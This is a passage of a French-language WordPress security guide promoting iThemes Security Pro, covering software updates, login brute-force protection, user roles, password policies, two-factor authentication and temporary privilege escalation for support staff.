Chaque fois que vous installez un nouveau plugin ou thème, vous introduisez un nouveau code qui a le potentiel d'être exploité par des pirates. Dans cette section, vous apprendrez les choses à faire et à ne pas faire pour gérer WordPress, les plugins et les thèmes.

1. Installez uniquement des logiciels provenant de sources fiables

Installez uniquement des plugins et des thèmes WordPress provenant de sources fiables. Vous ne devez installer que des logiciels que vous obtenez de WordPress.org, des référentiels commerciaux bien connus ou directement de développeurs réputés. Vous voudrez éviter la version « annulée » des plugins commerciaux car ils peuvent contenir du code malveillant. Peu importe comment vous verrouillez votre site WordPress si c'est vous qui installez des logiciels malveillants.

Si le plugin ou le thème WordPress n'est pas distribué sur le site Web du développeur, vous devrez faire preuve de diligence raisonnable avant de télécharger le plugin. Contactez les développeurs pour voir s'ils sont affiliés de quelque manière que ce soit au site Web qui propose leur produit à un prix gratuit ou à prix réduit.

2. Supprimer le plugin et les thèmes inutilisés

Avoir des plugins et des thèmes inutilisés ou inactifs sur votre site Web est une erreur de sécurité majeure de WordPress. Chaque morceau de code sur votre site Web est un point d'entrée potentiel pour un pirate informatique.

Il est courant pour les développeurs d'utiliser du code tiers, comme des bibliothèques JS, dans leurs plugins et thèmes. Malheureusement, si les bibliothèques ne sont pas correctement entretenues, elles peuvent créer des vulnérabilités que les attaquants peuvent exploiter pour pirater votre site Web.

Remarque : utilisez l'audit de site iThemes Sync Pro pour rechercher dans vos pages Web les bibliothèques JavaScript frontales présentant des vulnérabilités de sécurité connues.

Désinstallez et supprimez complètement tous les plugins et thèmes inutiles sur votre site WordPress pour limiter le nombre de points d'accès et de code exécutable sur votre site Web.

3. Gardez votre logiciel WordPress à jour

Garder le logiciel à jour est un élément essentiel de toute stratégie de sécurité WordPress. Les mises à jour ne concernent pas uniquement les corrections de bugs et les nouvelles fonctionnalités. Les mises à jour peuvent également inclure des correctifs de sécurité critiques. Sans ce correctif, vous laissez votre téléphone, ordinateur, serveur, routeur ou site Web vulnérable aux attaques.

Avoir un plugin ou un thème vulnérable pour lequel un correctif est disponible mais non appliqué est le principal coupable des sites Web WordPress piratés. Cela signifie que la plupart des vulnérabilités sont exploitées APRÈS la publication d' un correctif pour la vulnérabilité.

La violation très signalée d'Equifax aurait pu être évitée s'ils avaient mis à jour leur logiciel. Pour la violation d'Equifax, il n'y avait tout simplement aucune excuse.

Quelque chose d'aussi simple que la mise à jour de votre logiciel peut vous protéger. Alors n'ignorez pas ces mises à jour WordPress - les mises à jour sont l'un des composants les plus élémentaires de la sécurité WordPress et de toute sécurité Web.

Patch mardi

Patch Tuesday est le terme non officiel pour désigner les correctifs de bogues et de sécurité réguliers que Microsoft publie le deuxième mardi de chaque mois. C'est fantastique que Microsoft publie des correctifs de sécurité sur une cadence aussi fiable. Patch Tuesday est également le jour où les vulnérabilités de sécurité corrigées par Microsoft sont rendues publiques.

Consultez la section Quoi mettre à jour et comment automatiser vos mises à jour de l'ebook The Ultimate Guide to WordPress Security in 2020 pour savoir comment appliquer automatiquement les mises à jour Patch Tuesday.

Exploiter mercredi

Le mercredi suivant le Patch Tuesday, il est courant de voir de nombreux attaquants exploiter une vulnérabilité déjà connue sur des systèmes obsolètes et non corrigés. Ainsi, le mercredi suivant un Patch Tuesday a été officieusement appelé Exploit Mercredi.

Pourquoi les pirates ciblent-ils les vulnérabilités corrigées ?

Les pirates informatiques ciblent les vulnérabilités corrigées car ils savent que les gens ne mettent pas à jour (y compris les plugins et les thèmes sur votre site Web). C'est une norme de l'industrie de divulguer publiquement les vulnérabilités le jour où elles sont corrigées. Une fois qu'une vulnérabilité est divulguée publiquement, la vulnérabilité devient une « vulnérabilité connue » pour les versions obsolètes et non corrigées du logiciel. Les logiciels présentant des vulnérabilités connues sont une cible facile pour les pirates.

Les pirates aiment les cibles faciles, et avoir un logiciel avec des vulnérabilités connues, c'est comme donner à un pirate les instructions étape par étape pour s'introduire dans votre site Web WordPress, serveur, ordinateur ou tout autre appareil connecté à Internet.

Divulgation responsable

Vous vous demandez peut-être pourquoi une vulnérabilité serait divulguée si elle donne aux pirates un exploit à attaquer. Eh bien, il est très courant qu'un chercheur en sécurité trouve et signale en privé la vulnérabilité au développeur du logiciel.

Avec une divulgation responsable, le rapport initial du chercheur est remis en privé aux développeurs de la société propriétaire du logiciel, mais avec un accord selon lequel tous les détails seront publiés une fois qu'un correctif sera disponible. Pour les vulnérabilités de sécurité importantes, il peut y avoir un léger retard dans la divulgation de la vulnérabilité pour donner à plus de personnes le temps de corriger.

Le chercheur en sécurité peut fournir une date limite au développeur du logiciel pour répondre au rapport ou pour fournir un correctif. Si ce délai n'est pas respecté, le chercheur peut divulguer publiquement la vulnérabilité pour faire pression sur le développeur pour qu'il publie un correctif.

Divulguer publiquement une vulnérabilité et introduire apparemment un Zero Day - un type de vulnérabilité qui n'a pas de correctif et qui est exploité à l'état sauvage - peut sembler contre-productif. Mais c'est le seul levier dont dispose un chercheur pour faire pression sur le développeur pour qu'il corrige la vulnérabilité.

Si un pirate informatique découvrait la vulnérabilité, il pourrait utiliser discrètement l'exploit et causer des dommages à l'utilisateur final (c'est vous), tandis que le développeur du logiciel reste satisfait de laisser la vulnérabilité non corrigée.

Le Project Zero de Google a des directives similaires en ce qui concerne la divulgation des vulnérabilités. Ils publient tous les détails de la vulnérabilité après 90 jours, que la vulnérabilité ait été corrigée ou non.

Apprendre à se mettre à jour : à la dure

Fin 2018, les pirates profitaient activement d'un exploit dans le plugin WP GDPR Compliance. L'exploit a permis aux utilisateurs non autorisés (personnes non connectées à un site Web) de modifier les paramètres d'enregistrement des utilisateurs WP et de changer le nouveau rôle d'utilisateur par défaut d'abonné à administrateur. Heureusement, les développeurs du plugin WP GDPR Compliance ont agi rapidement et ont publié un correctif pour la vulnérabilité le lendemain de sa divulgation publique.

Mais, tout comme avec Exploit mercredi, les pirates ont ciblé la vulnérabilité même si un correctif avait été publié. Dans les jours et les semaines qui ont suivi la divulgation de la vulnérabilité WP GDPR Compliance, nous avons reçu une rafale de rapports selon lesquels des sites Web WordPress ont été piratés par des attaquants exploitant la vulnérabilité.

Avoir un plugin ou un thème vulnérable pour lequel un correctif est disponible mais non appliqué est le principal coupable des sites Web WordPress piratés. C'EST TROP FRUSTRANT !!!!! Cela signifie que la plupart des piratages WP auraient pu être évités.

Il est bouleversant de penser à toutes les personnes qui ont dépensé des tonnes d'argent pour nettoyer leur site Web, aux revenus qu'elles ont perdus alors que leurs sites étaient en panne et aux revenus futurs qu'elles ont perdus en perdant la confiance de leurs clients. Cela le rend encore plus bouleversant lorsque vous savez que toute cette angoisse aurait pu être évitée avec une simple mise à jour.

La fonctionnalité iThemes Security Pro Version Management permet de personnaliser et d'automatiser vos mises à jour WordPress.

4. Gardez une trace des vulnérabilités de WordPress

Garder vos plugins et thèmes à jour ne vous protégera pas de toutes les vulnérabilités WordPress. Certains plugins et thèmes WordPress ont été abandonnés par les développeurs qui les ont créés.

Malheureusement, si un plugin ou un thème abandonné présente une vulnérabilité, il n'obtiendra jamais de correctif. Les pirates cibleront les sites Web qui utilisent ces plugins désormais vulnérables en permanence.

Si vous avez un plugin abandonné avec une vulnérabilité connue sur votre site Web, vous donnez aux pirates les plans dont ils ont besoin pour prendre le contrôle de votre site Web. C'est pourquoi vous devez garder une trace de toutes les dernières vulnérabilités.

Il est difficile de garder une trace de chaque vulnérabilité WordPress divulguée et de comparer cette liste aux versions des plugins et des thèmes que vous avez installés sur votre site Web. Garder une trace des vulnérabilités est la différence entre un site Web sécurisé et un site Web que les pirates informatiques exploiteront facilement.

Bonne nouvelle pour vous ! Nous gardons une trace et partageons chaque vulnérabilité divulguée dans nos résumés des vulnérabilités WordPress.

5. Analysez votre site Web à la recherche de vulnérabilités

Un moyen plus rapide consiste à protéger votre site Web contre les exploits faciles des pirates informatiques consiste à utiliser des analyses automatisées pour rechercher sur vos sites Web les vulnérabilités connues.

Le scanner de site iThemes Security Pro est votre moyen d'automatiser la protection contre les vulnérabilités sur tous vos sites Web WordPress. Le scanner de site recherche sur votre site les vulnérabilités connues et appliquera automatiquement un correctif s'il en existe un.

Le site iThemes Security Pro vérifie 3 types de vulnérabilités.

1. Vulnérabilités WordPress
2. Vulnérabilités des plugins
3. Vulnérabilités du thème

La fonction d'audit de site iThemes Sync Pro exploite la puissance de Google Lighthouse pour protéger votre site Web. L'audit du site vérifie et signale les pages qui incluent des bibliothèques JavaScript frontales avec des vulnérabilités de sécurité connues.

Il est courant pour les développeurs d'utiliser du code tiers, comme des bibliothèques JS, dans leurs plugins et thèmes. Malheureusement, si les bibliothèques ne sont pas correctement entretenues, elles peuvent créer des vulnérabilités que les attaquants peuvent exploiter pour pirater votre site Web. L'utilisation de composants avec des vulnérabilités connues figure sur la liste des 10 premiers de l'OWASP.

L'audit du site a sauvé mon bacon ! J'ai créé un calendrier d'audit pour que Sync Pro effectue des audits automatisés hebdomadaires et m'envoie les rapports d'audit par e-mail. Je garde tout à jour, et c'est pourquoi j'ai été choqué quand j'ai vu dans l'un des audits de mon site Web que j'utilisais des bibliothèques JavaScript avec des vulnérabilités de sécurité connues.

Le rapport m'a signalé une version obsolète de jQuery dans le répertoire WordPress du site Web jonché de vulnérabilités connues ! Heureusement pour moi, j'ai vu dans mon audit de site Sync Pro que j'utilisais des bibliothèques JavaScript avec des vulnérabilités de sécurité connues et que j'ai pu résoudre le problème avant que mon site Web ne soit piraté.

Emballer

Gérer correctement le logiciel qui fait fonctionner votre site Web, y compris vos plugins WordPress, vos thèmes et votre noyau WordPress, contribuera grandement à votre stratégie de sécurité WordPress, en sécurisant votre site Web contre les attaquants en ligne.

Section 6 : Sécuriser votre connexion WordPress

L'URL de connexion WordPress est la même pour chaque site WordPress et ne nécessite aucune autorisation spéciale pour y accéder. Toute personne ayant une expérience de travail avec WordPress sait que l'URL de connexion se trouve sur la page /wp-login.php .

L'accessibilité de la page de connexion WordPress en fait la partie la plus attaquée - et potentiellement la plus vulnérable - de tout site Web WordPress. Heureusement pour nous, le plugin iThemes Security Pro facilite la sécurisation de votre connexion WordPress.

Jetons un coup d'œil aux outils d'iThemes Security Pro que vous pouvez utiliser pour sécuriser votre connexion WordPress et la rendre presque impénétrable !

1. Limiter les tentatives de connexion

La première étape pour sécuriser votre connexion WordPress est de limiter les tentatives de connexion infructueuses. Par défaut, rien n'est intégré à WordPress pour limiter le nombre de tentatives de connexion infructueuses qu'une personne peut effectuer. Sans limitation du nombre de tentatives de connexion infructueuses qu'un attaquant peut effectuer, il peut continuer à essayer une combinaison de différents noms d'utilisateur et mots de passe jusqu'à ce qu'il en trouve un qui fonctionne.

La fonction de protection locale contre la force brute d'iThemes Security Pro garde une trace des tentatives de connexion non valides effectuées par un hôte ou une adresse IP et un nom d'utilisateur. Une fois qu'une adresse IP ou un nom d'utilisateur a fait trop de tentatives de connexion invalides consécutives, ils seront verrouillés et ne pourront plus faire d'autres tentatives pendant une période de temps définie.

Pour commencer à utiliser la fonction Local Brute Force Protection , activez-la sur la page principale de la page des paramètres d'iThemes Security Pro.

Les paramètres de protection locale contre la force brute vous permettent de définir les seuils de verrouillage.

• Nombre maximal de tentatives de connexion par hôte – Le nombre de tentatives de connexion non valides qu'une adresse IP est autorisée avant qu'elle ne soit verrouillée.
• Nombre maximal de tentatives de connexion par utilisateur - Il s'agit du nombre de tentatives de connexion non valides qu'un nom d'utilisateur est autorisé avant qu'il ne soit verrouillé.
• Minutes à retenir Mauvaise connexion - Il s'agit de la durée pendant laquelle une tentative de connexion non valide doit être comptabilisée par rapport à une adresse IP ou un nom d'utilisateur pour un verrouillage.
• Interdire automatiquement l'utilisateur « admin » - Lorsque cette option est activée, toute personne utilisant le nom d'utilisateur Admin lors de la connexion reçoit un verrouillage automatique.

Il y a quelques points que vous devez garder à l'esprit lorsque vous configurez vos paramètres de verrouillage. Vous voulez donner des tentatives de connexion non valides aux utilisateurs que vous ne donnez d'adresses IP. Disons que votre site Web subit une attaque par force brute et que l'attaquant utilise votre nom d'utilisateur. L'objectif est de verrouiller l'adresse IP de l'attaquant et non votre nom d'utilisateur, afin que vous puissiez toujours vous connecter et travailler, même lorsque votre site Web est attaqué.

Vous ne voulez pas non plus rendre ces paramètres trop stricts en définissant le nombre de tentatives de connexion non valides trop bas et le temps de mémorisation des tentatives non valides trop long. Si vous réduisez le nombre de tentatives de connexion non valides pour les hôtes/IP à 1 et définissez les minutes pour mémoriser une mauvaise tentative de connexion à un mois, vous augmentez considérablement la probabilité de verrouiller par inadvertance des utilisateurs légitimes.

2. Limitez les tentatives d'authentification externes par demande

Il existe d'autres moyens de se connecter à WordPress en plus d'utiliser un formulaire de connexion. En utilisant XML-RPC, un attaquant peut effectuer des centaines de tentatives de noms d'utilisateurs et de mots de passe dans une seule requête HTTP. La méthode d'amplification par force brute permet aux attaquants de faire des milliers de tentatives de nom d'utilisateur et de mot de passe en utilisant XML-RPC en quelques requêtes HTTP.

En utilisant les paramètres WordPress Tweaks d' iThemes Security Pro, vous pouvez bloquer plusieurs tentatives d'authentification par requête XML-RPC. Limiter le nombre de tentatives de nom d'utilisateur et de mot de passe à une pour chaque demande contribuera grandement à sécuriser votre connexion WordPress.

3. Protection contre la force brute du réseau

Limiter les tentatives de connexion est une question de protection locale contre la force brute. La protection locale contre la force brute examine uniquement les tentatives d'accès à votre site et interdit les utilisateurs conformément aux règles de verrouillage spécifiées dans vos paramètres de sécurité.

La protection Network Brute Force va encore plus loin. Le réseau est la communauté iThemes Security et compte plus d'un million de sites Web. Si une adresse IP est identifiée comme tentant de pénétrer dans les sites Web de la communauté iThemes Security, l'adresse IP sera ajoutée à la liste des personnes interdites du réseau Bruce Force.

Une fois qu'une adresse IP figure sur la liste des réseaux interdits par force brute, l'adresse IP est bloquée sur tous les sites Web du réseau. Ainsi, si une adresse IP attaque mon site Web et est interdite, elle sera signalée au réseau iThemes Security Brute Force. Mon rapport peut aider à faire interdire l'IP sur l'ensemble du réseau. J'aime pouvoir aider à sécuriser la connexion WordPress d'autres personnes simplement en activant la protection du réseau de sécurité iThemes.

Pour commencer à utiliser Network Force Protection , activez-le sur la page principale des paramètres de sécurité.

Saisissez ensuite votre adresse e-mail, choisissez si vous souhaitez ou non recevoir les mises à jour par e-mail, puis cliquez sur le bouton Enregistrer .

4. Limiter l'accès de l'appareil au tableau de bord WP

La dernière étape pour sécuriser votre connexion WordPress consiste à limiter l'accès à votre tableau de bord WordPress à un ensemble d'appareils. La fonction Appareils de confiance iThemes Security Pro identifie les appareils que vous et les autres utilisateurs utilisez pour vous connecter à votre site WordPress. Lorsqu'un utilisateur s'est connecté sur un appareil non reconnu, les appareils de confiance peuvent restreindre leurs capacités de niveau administrateur. Cela signifie qu'un pirate a pu contourner vos autres méthodes de sécurité de connexion - ce qui est peu probable - il n'aurait pas la possibilité d'apporter des modifications malveillantes à votre site Web.

Pour commencer à utiliser Trusted Devices , activez-les sur la page principale des paramètres de sécurité, puis cliquez sur le bouton Configurer les paramètres .

Dans les paramètres Appareils de confiance, décidez quels utilisateurs vous souhaitez utiliser la fonctionnalité, puis activez les fonctionnalités Restreindre les capacités et Protection contre le piratage de session .

Après avoir activé le nouveau paramètre Appareils de confiance, les utilisateurs recevront une notification dans la barre d'administration WordPress concernant les appareils non reconnus en attente. Si votre appareil actuel n'a pas été ajouté à la liste des appareils de confiance, cliquez sur le lien Confirmer cet appareil pour envoyer l'e-mail d'autorisation .

Cliquez sur le bouton Confirmer l'appareil dans l'e-mail de connexion non reconnu pour ajouter vos appareils actuels à la liste des appareils de confiance.

Emballer

L'accessibilité de la page de connexion WordPress en fait la partie la plus attaquée – et potentiellement vulnérable – de tout site WordPress. Cependant, en suivant les étapes de cette section, votre connexion WordPress sera presque impénétrable.

Section 7 : Sécuriser vos utilisateurs WordPress

Chaque fois que nous parlons de sécurité des utilisateurs, nous entendons souvent des questions telles que : chaque utilisateur de WordPress devrait-il avoir les mêmes exigences de sécurité et dans quelle mesure la sécurité est-elle trop de sécurité ?

Ne t'inquiète pas. Nous répondons à toutes ces questions. Mais d'abord, parlons des différents types d'utilisateurs de WordPress.

Quels sont les différents types d'utilisateurs de WordPress ?

Il y a 5 utilisateurs WordPress par défaut différents.

1. Administrateur
2. Éditeur
3. Auteur
4. Donateur
5. Abonné

Chaque utilisateur a des capacités différentes. Les capacités dictent ce qu'ils peuvent faire une fois qu'ils accèdent au tableau de bord. En savoir plus sur les rôles et les autorisations des utilisateurs WordPress.

Les dommages potentiels de différents utilisateurs de WordPress piratés

Avant de pouvoir comprendre comment sécuriser nos utilisateurs WordPress, nous devons d'abord comprendre le niveau de menace de chaque type d'utilisateur compromis. Le type et le niveau de dommages qu'un attaquant peut infliger varient considérablement en fonction des rôles et des capacités de l'utilisateur qu'il pirate.

Administrateur – Niveau de menace élevé

Les utilisateurs administrateurs ont les capacités de tout ce qu'ils veulent.

• Créer, supprimer et modifier des utilisateurs.
• Installez, supprimez et modifiez des plugins et des thèmes.
• Créez, supprimez et modifiez tous les articles et pages.
• Publier et dépublier des articles et des pages.
• Ajouter et supprimer des médias.

Si un pirate informatique peut mettre la main sur l'un des administrateurs de votre site, il pourrait retenir votre site Web contre rançon. Comme nous l'avons mentionné précédemment, Ransomware fait référence au moment où un pirate informatique prend le contrôle de votre site Web et ne vous le rendra pas à moins que vous ne lui payiez des frais élevés.

Éditeur – Niveau de menace élevé

L' Editeur gère l'ensemble du contenu du site. Ces utilisateurs ont encore un peu de pouvoir.

• Créez, supprimez et modifiez tous les articles et pages.
• Publiez et dépubliez tous les articles et pages.
• Téléchargez des fichiers multimédias.
• Gérer tous les liens.
• Gérer les commentaires.
• Gérer les catégories.

Si un attaquant prenait le contrôle du compte d'un éditeur, il pourrait modifier l'une de vos pages pour l'utiliser dans une attaque de phishing. Le phishing est un type d'attaque utilisé pour voler les données des utilisateurs, y compris les identifiants de connexion et les numéros de carte de crédit.

L'hameçonnage est l'un des moyens les plus sûrs de mettre votre site Web sur la liste noire de Google. Chaque jour, 10 000 sites figurent sur la liste de blocage de Google pour diverses raisons.

Auteur – Niveau de menace Moyen

L' auteur a été conçu pour créer et gérer son propre contenu.

• Créez, supprimez et modifiez leurs propres publications et pages.
• Publier et dépublier leurs propres messages.
• Télécharger des fichiers multimédias

Si un attaquant prenait le contrôle du compte d'un auteur, il pourrait créer des pages et des publications qui renverraient les visiteurs de votre site vers des sites Web malveillants.

Contributeur et abonné – Niveau de menace faible

Le contributeur est la version allégée du rôle d'utilisateur Auteur. Ils n'ont aucun pouvoir d'édition.

• Créer et éditer leurs propres messages.
• Supprimer leurs propres messages non publiés.

L' Abonné peut lire les choses que les autres utilisateurs publient.

Bien que les pirates avec un rôle de contributeur ou d'abonné ne puissent effectuer aucune modification malveillante, ils peuvent voler toute information sensible stockée dans le compte ou la page de profil de l'utilisateur.

6 conseils pour sécuriser vos utilisateurs WordPress

D'accord, ce sont donc des trucs assez désagréables que les pirates peuvent faire sur nos sites Web. La bonne nouvelle est que la plupart des attaques sur vos comptes d'utilisateurs WordPress peuvent être évitées avec juste un petit effort de votre part.

Jetons un coup d'œil aux choses que vous pouvez faire pour sécuriser vos utilisateurs WordPress. La vérité est que ces méthodes de sécurité WordPress aideront à sécuriser chaque type d'utilisateur WordPress. Mais, au fur et à mesure que nous passerons en revue chacune des méthodes, nous vous indiquerons les utilisateurs dont vous devriez avoir besoin pour utiliser la méthode.

1. Ne donnez aux gens que les capacités dont ils ont besoin

Le moyen le plus simple de protéger votre site Web est de ne donner à vos utilisateurs que les capacités dont ils ont besoin et rien de plus. Si la seule chose que quelqu'un va faire sur votre site Web est de créer et de modifier ses propres articles de blog, il n'a pas besoin de pouvoir modifier les articles d'autres personnes.

2. Sécurisez les utilisateurs WordPress avec des mots de passe forts

Dans une liste compilée par Splash Data, le mot de passe le plus courant inclus dans tous les vidages de données était 123456. Un vidage de données est une base de données piratée remplie de mots de passe utilisateur vidés quelque part sur Internet. Pouvez-vous imaginer combien de personnes sur votre site Web utilisent un mot de passe faible si 123456 est le mot de passe le plus courant dans les vidages de données ?

Utiliser un mot de passe faible, c'est comme essayer de verrouiller votre porte d'entrée avec un morceau de ruban adhésif. Il n'a jamais fallu longtemps aux pirates pour forcer leur chemin à travers un mot de passe faible dans un site Web. Maintenant que les pirates informatiques utilisent des cartes graphiques dans leurs attaques, le temps nécessaire pour déchiffrer un mot de passe n'a jamais été aussi faible.

Par exemple, jetons un coup d'œil à un graphique créé par Terahash, une entreprise de craquage de mots de passe haute performance. Leur graphique montre le temps qu'il faut pour déchiffrer un mot de passe à l'aide d'un cluster de hachage de 448x RTX 2080.

Par défaut, WordPress utilise MD5 pour hacher les mots de passe des utilisateurs stockés dans la base de données WP. Ainsi, selon ce graphique, Terahash pourrait déchiffrer un mot de passe à 8 caractères… presque instantanément. Ce n'est pas seulement super impressionnant, mais c'est aussi vraiment effrayant. La bonne nouvelle est que nous pouvons sécuriser notre connexion WordPress en exigeant que nos utilisateurs de haut niveau utilisent des mots de passe forts.

La fonction d' exigence de mots de passe iThemes Security Pro vous permet de forcer des utilisateurs spécifiques à utiliser un mot de passe fort. Activez la fonctionnalité Exigences de mot de passe sur la page principale des paramètres de sécurité, puis sélectionnez les utilisateurs que vous souhaitez exiger d'utiliser un mot de passe fort.

3. Refusé des mots de passe compromis

Selon le rapport Verizon Data Breach Investigations, plus de 70 % des employés réutilisent les mots de passe au travail. Mais la statistique la plus importante du rapport est que 81% des violations liées au piratage ont utilisé des mots de passe volés ou faibles.

Les pirates informatiques utilisent une forme d'attaque par force brute appelée attaque par dictionnaire. Une attaque par dictionnaire est une méthode pour pénétrer dans un site Web WordPress avec des mots de passe couramment utilisés qui sont apparus dans les vidages de la base de données. La « Collection 1 ? La violation de données hébergée sur MEGA comprenait 1 160 253 228 combinaisons uniques d'adresses e-mail et de mots de passe. C'est un milliard avec un b. Ce type de score aidera vraiment une attaque par dictionnaire à affiner les mots de passe WordPress les plus couramment utilisés.

Il est indispensable d'empêcher les utilisateurs ayant des capacités de niveau Auteur et au-dessus d'utiliser des mots de passe compromis pour sécuriser votre connexion WordPress. Vous pouvez également penser à ne pas laisser vos utilisateurs de niveau inférieur utiliser des mots de passe compromis.

Il est tout à fait compréhensible et encouragé de rendre la création d'un nouveau compte client aussi simple que possible. Cependant, votre client peut ne pas savoir que le mot de passe qu'il utilise a été trouvé dans un vidage de données. Vous rendriez un grand service à vos clients en les alertant du fait que le mot de passe qu'ils utilisent a été compromis. S'ils utilisent ce mot de passe partout, vous pourriez leur éviter de gros maux de tête plus tard.

La fonction Refuser les mots de passe compromis d'iThemes Security Pro oblige les utilisateurs à utiliser des mots de passe qui n'apparaissent dans aucune violation de mot de passe suivie par Have I Been Pwned. Activez la fonctionnalité Exigences de mot de passe sur la page principale des paramètres de sécurité, puis sélectionnez les utilisateurs que vous souhaitez empêcher d'utiliser un mot de passe compromis.

4. Sécurisez les utilisateurs de WordPress avec une authentification à deux facteurs

L'utilisation d'authentifications à deux facteurs est la meilleure chose que vous puissiez faire pour sécuriser votre connexion WordPress. L'authentification à deux facteurs est un processus de vérification de l'identité d'une personne en exigeant deux méthodes de vérification distinctes. Google a partagé sur son blog que l'utilisation de l'authentification à deux facteurs peut arrêter 100% des attaques de bots automatisées. J'aime vraiment ces cotes.

La fonction d' authentification à deux facteurs d'iThemes Security Pro offre une grande flexibilité lors de la mise en œuvre de 2fa sur votre site Web. Vous pouvez activer le double facteur pour tout ou partie de vos utilisateurs, et vous pouvez forcer vos utilisateurs de haut niveau à utiliser 2fa à chaque connexion.

Pour votre commodité, iThemes Security Pro propose 2 méthodes différentes d'authentification à deux facteurs.

1. Application mobile - La méthode de l'application mobile est la méthode d'authentification à deux facteurs la plus sécurisée fournie par iThemes Security Pro. Cette méthode nécessite que vous utilisiez une application mobile gratuite à deux facteurs comme Authy.
2. E - mail - La méthode d'e-mail à deux facteurs enverra des codes sensibles au temps à l'adresse e-mail de votre utilisateur.
3. Codes de sauvegarde – Un ensemble de codes à usage unique qui peuvent être utilisés pour se connecter en cas de perte de la méthode principale à deux facteurs.

5. Sécurisez les utilisateurs de WordPress contre le piratage de session

WordPress génère un cookie de session chaque fois que vous vous connectez à votre site Web. Et disons que vous avez une extension de navigateur qui a été abandonnée par le développeur et ne publie plus de mises à jour de sécurité. Malheureusement pour vous, l'extension de navigateur négligée présente une vulnérabilité. La vulnérabilité permet à de mauvais acteurs de détourner les cookies de votre navigateur, y compris le cookie de session WordPress mentionné précédemment. Ce type de piratage est connu sous le nom de piratage de session . Ainsi, un attaquant peut exploiter la vulnérabilité de l'extension pour se greffer à votre connexion et commencer à apporter des modifications malveillantes à votre utilisateur WordPress.

Vous devriez avoir mis en place une protection contre le piratage de session pour vos administrateurs et éditeurs.

La fonction Appareils de confiance iThemes Security Pro fait du piratage de session une chose du passé. Si l'appareil d'un utilisateur change au cours d'une session, iThemes Security déconnectera automatiquement l'utilisateur pour empêcher toute activité non autorisée sur le compte de l'utilisateur, telle que la modification de l'adresse e-mail de l'utilisateur ou le téléchargement de plug-ins malveillants.

6. Créer un utilisateur de support universel

Chaque fois que vous créez un nouvel utilisateur, vous ajoutez un autre point d'entrée qu'un pirate pourrait exploiter. Mais il y aura probablement des moments où vous aurez besoin d'une aide extérieure pour votre site Web, comme lorsque vous cherchez de l'aide ou après avoir embauché un entrepreneur indépendant. Vous avez besoin d'un moyen sûr et sécurisé d'ajouter un accès administrateur temporaire à votre site Web.

Par exemple, disons que vous rencontrez des problèmes avec l'un des plugins installés sur votre site Web. Après avoir contacté l'assistance, ils demandent un accès administrateur à votre site Web afin de pouvoir y jeter un œil de plus près. Cela semble être une demande parfaitement raisonnable et vous décidez de leur accorder l'accès.

Alors, comment donner à quelqu'un un accès administrateur temporaire à notre site Web WordPress ?

Accorder un accès extérieur à votre site Web : les deux options

En règle générale, vous avez deux options pour fournir un accès externe à votre site Web…. et ni l'un ni l'autre ne sont grands .

1. Partagez les informations d'identification de votre utilisateur

Votre première et pire option est de partager le nom d'utilisateur et le mot de passe de votre administrateur WordPress.

Pourquoi partager vos informations d'identification d'administrateur est terrible

• Sécurité réduite – Si vous partagez les informations d'identification de votre utilisateur, vous devrez désactiver l'authentification à deux facteurs pour permettre à la personne utilisant vos informations d'identification de se connecter. Google a partagé sur son blog que l'utilisation de l'authentification à deux facteurs, ou vérification en 2 étapes, peut arrêter 100% des attaques de bots automatisées. La désactivation de l'authentification à deux facteurs, même pour une courte période, réduit considérablement la sécurité de votre site Web.
• Inconvénient – Le partage de vos informations d'identification vous oblige à changer votre mot de passe. Si vous oubliez de changer votre mot de passe, une ou plusieurs personnes ont un accès administrateur à votre site Web quand elles le souhaitent.

2. Créer un nouvel utilisateur pour le support technique

Bien qu'il soit préférable de créer un nouvel utilisateur administrateur pour le spécialiste de l'assistance que de partager vos informations d'identification d'administrateur, ce n'est toujours pas génial.

Pourquoi la création d'un utilisateur pour le support technique est terrible

• Vulnérabilité accrue – La création d'un nouvel utilisateur administrateur ajoute un autre point d'entrée qui pourrait être exploité. Si vous n'avez pas mis en place de politique de mot de passe, le support technique peut choisir un mot de passe faible, rendant votre connexion WordPress plus vulnérable aux attaques.
• Inconvénient – Passer par le processus de configuration d'un nouvel utilisateur chaque fois que vous avez besoin d'une aide extérieure prend du temps. Vous devez créer le nouvel utilisateur, puis n'oubliez pas de supprimer l'utilisateur lorsqu'il n'a plus besoin d'accéder à votre site Web. C'est une bonne pratique de sécurité WordPress pour supprimer tous les utilisateurs inutilisés de votre site Web.

Qu'est-ce que l'escalade de privilèges ?

La fonction d'escalade des privilèges d'iThemes Security Pro vous permet d'accorder temporairement des capacités supplémentaires à un utilisateur.

Privilege Escalation permet de créer facilement et en toute sécurité un utilisateur universel que vous pouvez donner à tous les développeurs externes ou techniciens de support qui ont besoin d'un accès temporaire à votre site Web.

Avec Privilege Escalation, vous pouvez créer un nouvel utilisateur et le nommer Support et lui donner le rôle d'utilisateur Abonné. La prochaine fois que vous devrez fournir un accès temporaire à votre site Web, vous pourrez faire passer l'utilisateur du support d'abonné à administrateur. Nous verrons comment procéder plus tard dans l'article, mais d'abord, voyons pourquoi l'escalade de privilèges est un meilleur moyen d'accorder l'accès à votre site Web.

Pourquoi l'escalade des privilèges est meilleure

• Facile – Vous n'avez pas besoin de créer un nouvel utilisateur à chaque fois que vous devez autoriser l'accès à votre site Web.
• Automatique – L'augmentation des privilèges ne dure que 24 heures. Après 24 heures, l'utilisateur perd automatiquement tous les privilèges supplémentaires. Vous n'avez pas à vous souvenir de supprimer des utilisateurs ou de modifier des mots de passe.
• Pas de sacrifice en matière de sécurité – Vous pouvez toujours demander à cet utilisateur de support universel d'utiliser la méthode de courrier électronique à deux facteurs pour vous connecter, ce qui signifie que vous avez le même niveau de sécurité qu'avec vos autres utilisateurs administrateurs. Étant donné que le rôle d'utilisateur réel est un abonné, vous ne courez aucun risque réel de le laisser sur votre site Web.

Comment utiliser l'escalade de privilèges dans iThemes Security Pro

Pour commencer, activez l' escalade de privilèges sur la page principale des paramètres de sécurité.

Vous pouvez créer un nouvel utilisateur, le nommer Support et lui attribuer le rôle d'utilisateur Abonné. La prochaine fois que vous devrez fournir un accès temporaire à votre site Web, accédez à la page de profil de votre utilisateur d'assistance.

Mettez à jour l'adresse e-mail pour permettre à la personne d'assistance externe de demander un nouveau mot de passe. Faites ensuite défiler vers le bas jusqu'à ce que vous voyiez les paramètres d'escalade temporaire des privilèges. Cliquez sur le bouton bascule Définir un rôle temporaire et sélectionnez Admin. L'utilisateur aura désormais un accès administrateur pour les prochaines 24 heures.

